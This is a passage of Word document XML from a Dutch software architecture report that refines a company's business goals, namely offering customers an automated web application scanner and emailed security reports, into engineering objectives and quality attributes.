                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>We moeten de service aanbod uitbreiden door een geautomatiseerde Web Applicatie Scanner te introduceren.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3626" w:type="dxa"/>
          </w:tcPr>
          <w:tbl>
            <w:tblPr>
              <w:tblStyle w:val="TableGrid"/>
              <w:tblW w:w="0" w:type="auto"/>
              <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
            </w:tblPr>
            <w:tblGrid>
              <w:gridCol w:w="3383"/>
            </w:tblGrid>
            <w:tr w:rsidR="000B1F17" w14:paraId="03DAEEB0" w14:textId="77777777" w:rsidTr="000B1F17">
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="3471" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="7FB2A7C3" w14:textId="455A80E2" w:rsidR="00474D6B" w:rsidRPr="0073200F" w:rsidRDefault="0073200F">
                  <w:pPr>
                    <w:rPr>
                      <w:sz w:val="24"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:sz w:val="24"/>
                    </w:rPr>
                    <w:t xml:space="preserve">DS: </w:t>
                  </w:r>
                  <w:r w:rsidR="001F51D9">
                    <w:rPr>
                      <w:sz w:val="24"/>
                    </w:rPr>
                    <w:t>S5</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="000B1F17" w14:paraId="7D5454DA" w14:textId="77777777" w:rsidTr="000B1F17">
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="3471" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="01037962" w14:textId="447AC8EE" w:rsidR="00474D6B" w:rsidRPr="001F51D9" w:rsidRDefault="001F51D9">
                  <w:pPr>
                    <w:rPr>
                      <w:sz w:val="24"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:sz w:val="24"/>
                    </w:rPr>
                    <w:t xml:space="preserve">DO: </w:t>
                  </w:r>
                  <w:r w:rsidR="00857037">
                    <w:rPr>
                      <w:sz w:val="24"/>
                    </w:rPr>
                    <w:t>Web Applicatie Scanner</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="000B1F17" w14:paraId="172CBAE5" w14:textId="77777777" w:rsidTr="000B1F17">
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="3471" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="27482E80" w14:textId="6C70E1C4" w:rsidR="00474D6B" w:rsidRPr="00351F2E" w:rsidRDefault="00D344DA">
                  <w:pPr>
                    <w:rPr>
                      <w:sz w:val="24"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:sz w:val="24"/>
                    </w:rPr>
                    <w:t>O:</w:t>
                  </w:r>
                  <w:r w:rsidR="00D873C8">
                    <w:rPr>
                      <w:sz w:val="24"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> </w:t>
                  </w:r>
                  <w:r w:rsidR="003518B7">
                    <w:rPr>
                      <w:sz w:val="24"/>
                    </w:rPr>
                    <w:t>Service aanbod uitbreiden</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="000B1F17" w14:paraId="75BE3335" w14:textId="77777777" w:rsidTr="000B1F17">
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="3471" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="2A0AA73A" w14:textId="6323F408" w:rsidR="00474D6B" w:rsidRPr="00316498" w:rsidRDefault="00316498">
                  <w:pPr>
                    <w:rPr>
                      <w:sz w:val="24"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:sz w:val="24"/>
                    </w:rPr>
                    <w:t xml:space="preserve">D: </w:t>
                  </w:r>
                  <w:r w:rsidR="000B1F17">
                    <w:rPr>
                      <w:sz w:val="24"/>
                    </w:rPr>
                    <w:t>Een nieuwe service aanbieden</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="000B1F17" w14:paraId="79EA01E6" w14:textId="77777777" w:rsidTr="000B1F17">
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="3471" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="1CBF81F9" w14:textId="51402225" w:rsidR="00474D6B" w:rsidRPr="001849E7" w:rsidRDefault="001849E7">
                  <w:pPr>
                    <w:rPr>
                      <w:sz w:val="24"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:sz w:val="24"/>
                    </w:rPr>
                    <w:t xml:space="preserve">DM: </w:t>
                  </w:r>
                  <w:r w:rsidR="002E27CB">
                    <w:rPr>
                      <w:sz w:val="24"/>
                    </w:rPr>
                    <w:t>Klanten kunnen een gratis geautomatiseerde scan uitvoeren</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="000B1F17" w14:paraId="3FDD9B91" w14:textId="77777777" w:rsidTr="000B1F17">
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="3471" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="2157C998" w14:textId="308967C2" w:rsidR="00474D6B" w:rsidRPr="00232CA1" w:rsidRDefault="0088180B" w:rsidP="00C107E9">
                  <w:pPr>
                    <w:rPr>
                      <w:sz w:val="24"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:sz w:val="24"/>
                    </w:rPr>
                    <w:t xml:space="preserve">AI: S5 wilt de klanten </w:t>
                  </w:r>
                  <w:r w:rsidR="00C107E9">
                    <w:rPr>
                      <w:sz w:val="24"/>
                    </w:rPr>
                    <w:t>een tool aanbieden om hun websites te scannen op security</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p w14:paraId="7FDA8774" w14:textId="77777777" w:rsidR="00CC637F" w:rsidRDefault="00CC637F">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DE0A7C" w14:paraId="2E42571C" w14:textId="77777777" w:rsidTr="00272E09">
        <w:trPr>
          <w:trHeight w:val="3241"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1693" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6A02A53A" w14:textId="73A2153C" w:rsidR="00D76D64" w:rsidRPr="008E079D" w:rsidRDefault="00715A5F" w:rsidP="00D76D64">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>Het servicekwaliteit verbeteren</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4454" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="02898CD9" w14:textId="08BC8A9B" w:rsidR="00CC637F" w:rsidRPr="007868ED" w:rsidRDefault="00427F54">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">We moeten </w:t>
            </w:r>
            <w:r w:rsidR="00935B42">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>n</w:t>
            </w:r>
            <w:r w:rsidR="0067285E">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>aast het ontwikkelen van webshop</w:t>
            </w:r>
            <w:r w:rsidR="00935B42">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> ook meer de focus leggen op security</w:t>
            </w:r>
            <w:r w:rsidR="00845839">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> door de klant meer inzicht te bieden op de security staat van hun webshop.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3626" w:type="dxa"/>
          </w:tcPr>
          <w:tbl>
            <w:tblPr>
              <w:tblStyle w:val="TableGrid"/>
              <w:tblW w:w="0" w:type="auto"/>
              <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
            </w:tblPr>
            <w:tblGrid>
              <w:gridCol w:w="3383"/>
            </w:tblGrid>
            <w:tr w:rsidR="000A0DB4" w:rsidRPr="0073200F" w14:paraId="7E6B85ED" w14:textId="77777777" w:rsidTr="00346F1B">
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="3471" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="787A1459" w14:textId="77777777" w:rsidR="000A0DB4" w:rsidRPr="0073200F" w:rsidRDefault="000A0DB4" w:rsidP="00346F1B">
                  <w:pPr>
                    <w:rPr>
                      <w:sz w:val="24"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:sz w:val="24"/>
                    </w:rPr>
                    <w:t>DS: S5</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="000A0DB4" w:rsidRPr="001F51D9" w14:paraId="0CFB4796" w14:textId="77777777" w:rsidTr="00346F1B">
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="3471" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="7DFDCF01" w14:textId="23433C03" w:rsidR="000A0DB4" w:rsidRPr="001F51D9" w:rsidRDefault="000A0DB4" w:rsidP="00054BB0">
                  <w:pPr>
                    <w:rPr>
                      <w:sz w:val="24"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:sz w:val="24"/>
                    </w:rPr>
                    <w:t xml:space="preserve">DO: </w:t>
                  </w:r>
                  <w:r w:rsidR="00054BB0">
                    <w:rPr>
                      <w:sz w:val="24"/>
                    </w:rPr>
                    <w:t>Security Rapport</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="000A0DB4" w:rsidRPr="00351F2E" w14:paraId="5E7C86D5" w14:textId="77777777" w:rsidTr="00346F1B">
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="3471" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="1EF60077" w14:textId="050B2A7B" w:rsidR="000A0DB4" w:rsidRPr="00351F2E" w:rsidRDefault="000A0DB4" w:rsidP="00561F21">
                  <w:pPr>
                    <w:rPr>
                      <w:sz w:val="24"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:sz w:val="24"/>
                    </w:rPr>
                    <w:t xml:space="preserve">O: </w:t>
                  </w:r>
                  <w:r w:rsidR="00561F21">
                    <w:rPr>
                      <w:sz w:val="24"/>
                    </w:rPr>
                    <w:t>Kwaliteit service verbeteren</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="000A0DB4" w:rsidRPr="00316498" w14:paraId="39B42CB9" w14:textId="77777777" w:rsidTr="00346F1B">
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="3471" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="6A4D7CA8" w14:textId="72768F87" w:rsidR="000A0DB4" w:rsidRPr="00316498" w:rsidRDefault="000A0DB4" w:rsidP="00346F1B">
                  <w:pPr>
                    <w:rPr>
                      <w:sz w:val="24"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:sz w:val="24"/>
                    </w:rPr>
                    <w:t xml:space="preserve">D: </w:t>
                  </w:r>
                  <w:r w:rsidR="009A11E6">
                    <w:rPr>
                      <w:sz w:val="24"/>
                    </w:rPr>
                    <w:t>Security Rapporten genereren op basis van de gevonden kwetsbaarheden</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="000A0DB4" w:rsidRPr="001849E7" w14:paraId="226BB53F" w14:textId="77777777" w:rsidTr="00346F1B">
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="3471" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="50247A11" w14:textId="4E4E8463" w:rsidR="000A0DB4" w:rsidRPr="001849E7" w:rsidRDefault="000A0DB4" w:rsidP="009A11E6">
                  <w:pPr>
                    <w:rPr>
                      <w:sz w:val="24"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:sz w:val="24"/>
                    </w:rPr>
                    <w:t xml:space="preserve">DM: </w:t>
                  </w:r>
                  <w:r w:rsidR="007425DA">
                    <w:rPr>
                      <w:sz w:val="24"/>
                    </w:rPr>
                    <w:t>Klanten inzicht bieden in de security van hen webshops</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="000A0DB4" w:rsidRPr="00232CA1" w14:paraId="5211AE0F" w14:textId="77777777" w:rsidTr="00346F1B">
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="3471" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="1914E7EA" w14:textId="77777777" w:rsidR="000A0DB4" w:rsidRPr="00232CA1" w:rsidRDefault="000A0DB4" w:rsidP="00346F1B">
                  <w:pPr>
                    <w:rPr>
                      <w:sz w:val="24"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:sz w:val="24"/>
                    </w:rPr>
                    <w:t>AI: S5 wilt de klanten meer overzicht bieden op de security van hen webshops</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p w14:paraId="71ED0E16" w14:textId="77777777" w:rsidR="00CC637F" w:rsidRDefault="00CC637F">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="36A22D62" w14:textId="77777777" w:rsidR="00272E09" w:rsidRDefault="00272E09" w:rsidP="002F3E27">
      <w:r w:rsidRPr="00272E09">
        <w:t>Tabel 2.5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79258D85" w14:textId="06B3CFCA" w:rsidR="005C6FF5" w:rsidRPr="00272E09" w:rsidRDefault="005C6FF5">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C6FF5">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Business doelen verfijnen</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EBAF03A" w14:textId="0B65EC89" w:rsidR="00F5420D" w:rsidRDefault="003A6872">
      <w:r>
        <w:t xml:space="preserve">Het doel van het verfijnen van de business doelen is om de relevantie ervan te vinden met betrekking tot het softwaresysteem dat onderontwikkeling is. </w:t>
      </w:r>
      <w:r w:rsidR="00F95E23">
        <w:t>Verfijnde business doelen worden</w:t>
      </w:r>
      <w:r w:rsidR="00972417">
        <w:t xml:space="preserve"> operationele objectieven en als je daaruit de relevante operationele objectieven haalt dan hou je engineering objectieven over</w:t>
      </w:r>
      <w:r w:rsidR="009142E2">
        <w:t xml:space="preserve"> (Software </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="009142E2">
        <w:t>and</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="009142E2">
        <w:t xml:space="preserve"> Systeem Architecture In Action, H 2.4 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="009142E2">
        <w:t>Refining</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="009142E2">
        <w:t xml:space="preserve"> Business Goals)</w:t>
      </w:r>
      <w:r w:rsidR="00972417">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="000C1495">
        <w:t xml:space="preserve"> In het geval van het project resulteren de twee business doelen in relevante operationele objec</w:t>
      </w:r>
      <w:r w:rsidR="00C47BFE">
        <w:t>tieven vanwege</w:t>
      </w:r>
      <w:r w:rsidR="004D6AE6">
        <w:t xml:space="preserve"> hun betrekking op het systeem.</w:t>
      </w:r>
      <w:r w:rsidR="009142E2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2827"/>
        <w:gridCol w:w="5670"/>
      </w:tblGrid>
      <w:tr w:rsidR="0067285E" w14:paraId="086F346B" w14:textId="77777777" w:rsidTr="0067285E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2827" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0AD76EA0" w14:textId="4512F2C0" w:rsidR="00773357" w:rsidRDefault="001A5781">
            <w:r>
              <w:t>Business Doelen</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5670" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="05BB95D1" w14:textId="6B4F8F94" w:rsidR="00773357" w:rsidRDefault="001A5781">
            <w:r>
              <w:t>Verfijnde doelen (Engineering Objectieven)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0067285E" w14:paraId="39FD0988" w14:textId="77777777" w:rsidTr="0067285E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2827" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2D3A96E8" w14:textId="79B6BFAE" w:rsidR="00773357" w:rsidRDefault="000A510D">
            <w:r w:rsidRPr="00503AB1">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>We moeten de service aanbod uitbreiden door een geautomatiseerde Web Applicatie Scanner te introduceren.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5670" w:type="dxa"/>
          </w:tcPr>
          <w:tbl>
            <w:tblPr>
              <w:tblStyle w:val="TableGrid"/>
              <w:tblW w:w="0" w:type="auto"/>
              <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
            </w:tblPr>
            <w:tblGrid>
              <w:gridCol w:w="5444"/>
            </w:tblGrid>
            <w:tr w:rsidR="001473B4" w14:paraId="57A99FAB" w14:textId="77777777" w:rsidTr="00660BF9">
              <w:trPr>
                <w:trHeight w:val="557"/>
              </w:trPr>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="5556" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="6CD2378A" w14:textId="5C819C19" w:rsidR="001473B4" w:rsidRDefault="00BA29E1">
                  <w:r>
                    <w:t>Een Client applicatie voor de klant</w:t>
                  </w:r>
                  <w:r w:rsidR="00F74324">
                    <w:t xml:space="preserve"> wat dient als </w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidR="00F74324">
                    <w:t>Endpoint</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r w:rsidR="00F74324">
                    <w:t xml:space="preserve"> (</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidR="00F74324">
                    <w:t>Glossery</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r w:rsidR="00F74324">
                    <w:t xml:space="preserve">, </w:t>
                  </w:r>
                  <w:r w:rsidR="00F25C90">
                    <w:t>13</w:t>
                  </w:r>
                  <w:r w:rsidR="00F74324">
                    <w:t>)</w:t>
                  </w:r>
                  <w:r>
                    <w:t xml:space="preserve"> </w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="001473B4" w14:paraId="5FC3633E" w14:textId="77777777" w:rsidTr="00660BF9">
              <w:trPr>
                <w:trHeight w:val="404"/>
              </w:trPr>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="5556" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="215F4AC0" w14:textId="71399929" w:rsidR="001473B4" w:rsidRDefault="006E4B6E">
                  <w:r>
                    <w:t xml:space="preserve">Een </w:t>
                  </w:r>
                  <w:r w:rsidR="00996119">
                    <w:t>communicatiemiddel</w:t>
                  </w:r>
                  <w:r>
                    <w:t xml:space="preserve"> tussen de Client en de Server</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="001473B4" w14:paraId="0A4541B8" w14:textId="77777777" w:rsidTr="00660BF9">
              <w:trPr>
                <w:trHeight w:val="418"/>
              </w:trPr>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="5556" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="65C323E7" w14:textId="78A6BB3E" w:rsidR="001473B4" w:rsidRDefault="00510B83">
                  <w:r>
                    <w:t xml:space="preserve">De </w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r>
                    <w:t>Wep</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r>
                    <w:t xml:space="preserve"> Applicatie Scanner</w:t>
                  </w:r>
                  <w:r w:rsidR="00F553C8">
                    <w:t xml:space="preserve">, </w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidR="00F553C8">
                    <w:t>Crawler</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r w:rsidR="00F553C8">
                    <w:t>, Scanner, Rapporteren</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p w14:paraId="3BBC184D" w14:textId="77777777" w:rsidR="00773357" w:rsidRDefault="00773357"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0067285E" w14:paraId="35263258" w14:textId="77777777" w:rsidTr="0067285E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2827" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="61C3C8EE" w14:textId="2CAE8B49" w:rsidR="0026441A" w:rsidRDefault="00845839">
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>We moeten naast het ontwikkelen van webshop ook meer de focus leggen op security door de klant meer inzicht te bieden op de security staat van hun webshop.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5670" w:type="dxa"/>
          </w:tcPr>
          <w:tbl>
            <w:tblPr>
              <w:tblStyle w:val="TableGrid"/>
              <w:tblW w:w="0" w:type="auto"/>
              <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
            </w:tblPr>
            <w:tblGrid>
              <w:gridCol w:w="5444"/>
            </w:tblGrid>
            <w:tr w:rsidR="00F07204" w14:paraId="077FA2A2" w14:textId="77777777" w:rsidTr="00845839">
              <w:trPr>
                <w:trHeight w:val="935"/>
              </w:trPr>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="5585" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="4FF51050" w14:textId="2EB93BDB" w:rsidR="00F07204" w:rsidRDefault="0046447A">
                  <w:r>
                    <w:t>Het genereren van een rapport op basis van de gevonden kwetsbaarheden</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00F07204" w14:paraId="72F28F79" w14:textId="77777777" w:rsidTr="00845839">
              <w:trPr>
                <w:trHeight w:val="1005"/>
              </w:trPr>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="5585" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="468EE4F6" w14:textId="3A999AAD" w:rsidR="00F07204" w:rsidRDefault="00037E8D">
                  <w:r>
                    <w:t>Het verzenden van het rapport via email</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p w14:paraId="2F002F60" w14:textId="77777777" w:rsidR="0026441A" w:rsidRDefault="0026441A"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1A3B9026" w14:textId="57FBB0C1" w:rsidR="00505582" w:rsidRDefault="00972417">
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00272E09">
        <w:t>Tabel 2.6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7989982A" w14:textId="697B59D1" w:rsidR="00D12EE6" w:rsidRDefault="00550C76">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Engineering </w:t>
      </w:r>
      <w:r w:rsidR="00F12348">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">objectieven, </w:t>
      </w:r>
      <w:r w:rsidR="00D12EE6">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>kwaliteit attributen</w:t>
      </w:r>
      <w:r w:rsidR="00F12348">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> en prioriteiten</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1017629B" w14:textId="30B0950C" w:rsidR="00E7100D" w:rsidRPr="00195C12" w:rsidRDefault="00A92E11">
      <w:r>
        <w:t xml:space="preserve">Engineering objectieven kunnen gebruikt worden om de systeemeisen van </w:t>
      </w:r>
      <w:r w:rsidR="00F94D11">
        <w:t>de systeemarchitectuur</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> te definiëren.</w:t>
      </w:r>
      <w:r w:rsidR="00A41B12">
        <w:t xml:space="preserve"> Elke engineering objectief heeft een corresponderende </w:t>
      </w:r>
      <w:r w:rsidR="005B66E7">
        <w:t xml:space="preserve">kwaliteit attribuut, deze vormen de basis voor het definiëren van de systeemeisen. </w:t>
      </w:r>
      <w:r w:rsidR="004813FF">
        <w:t xml:space="preserve">Als voorbeeld kunnen kijken naar de business doel, het behouden van de markt reputatie. Dit business doel correspondeert met de engineering objectief: het maken van producten dat zeer </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="004813FF">
        <w:t>Usable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="004813FF">
        <w:t xml:space="preserve"> en </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="004813FF">
        <w:t>Reliable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="004813FF">
        <w:t xml:space="preserve"> is. </w:t>
      </w:r>
      <w:r w:rsidR="00813658">
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="00D14C7C">
        <w:t>Het</w:t>
      </w:r>
      <w:r w:rsidR="00813658">
        <w:t xml:space="preserve"> kwaliteit attributen kun je vinden in Bijlage A).</w:t>
      </w:r>
      <w:r w:rsidR="00AB5AC6">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2225"/>
        <w:gridCol w:w="3114"/>
        <w:gridCol w:w="2022"/>
        <w:gridCol w:w="1701"/>
      </w:tblGrid>
      <w:tr w:rsidR="005653E3" w14:paraId="11DF6E47" w14:textId="5463FAB7" w:rsidTr="005653E3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2225" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6C2E82B0" w14:textId="77777777" w:rsidR="005653E3" w:rsidRDefault="005653E3" w:rsidP="008B56CF">
            <w:r>
              <w:t>Business Doelen</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3114" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4F58847C" w14:textId="77777777" w:rsidR="005653E3" w:rsidRDefault="005653E3" w:rsidP="008B56CF">
            <w:r>
              <w:t>Verfijnde doelen (Engineering Objectieven)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2022" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3E1E937B" w14:textId="2149EE4F" w:rsidR="005653E3" w:rsidRDefault="005653E3" w:rsidP="008B56CF">
            <w:r>
              <w:t>Kwaliteit Attribuut</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1A96194C" w14:textId="3B1A16B4" w:rsidR="005653E3" w:rsidRDefault="005653E3" w:rsidP="008B56CF">
            <w:r>
              <w:t>Prioriteit</w:t>
            </w:r>
          </w:p>
        </w:tc>
